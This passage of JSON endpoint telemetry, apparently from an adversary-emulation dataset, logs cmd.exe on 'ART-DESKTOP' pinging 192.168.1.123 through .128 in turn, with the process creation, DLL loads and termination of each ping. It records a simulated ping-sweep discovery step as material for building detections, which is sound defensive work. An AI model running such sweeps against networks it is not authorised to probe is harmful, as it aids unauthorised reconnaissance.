"{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572577140000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "event_type": "process", - "pid": 820, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572581830000, - "unique_pid": "{42FC7E13-CB89-5C05-0000-001091B95201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.123", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4944, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572581980000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "event_type": "process", - "pid": 4944, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572586990000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001011BC5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.124", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7460, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572587140000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "event_type": "process", - "pid": 7460, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572591990000, - "unique_pid": "{42FC7E13-CB8A-5C05-0000-001086BE5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.125", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1376, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572592140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "event_type": "process", - "pid": 1376, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572596990000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001004C15201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.126", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6080, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572597140000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "event_type": "process", - "pid": 6080, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572601830000, - "unique_pid": "{42FC7E13-CB8B-5C05-0000-001078C35201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.127", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6392, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572601990000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572601980000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "event_type": "process", - "pid": 6392, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572606990000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-0010F6C55201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.128", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 764, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607140000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572607300000, - "unique_pid": "{42FC7E13-CB8C-5C05-0000-001066C85201}" - }, - { - "event_type": "process", - "pid": 764, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572611990000, - "unique_pid": 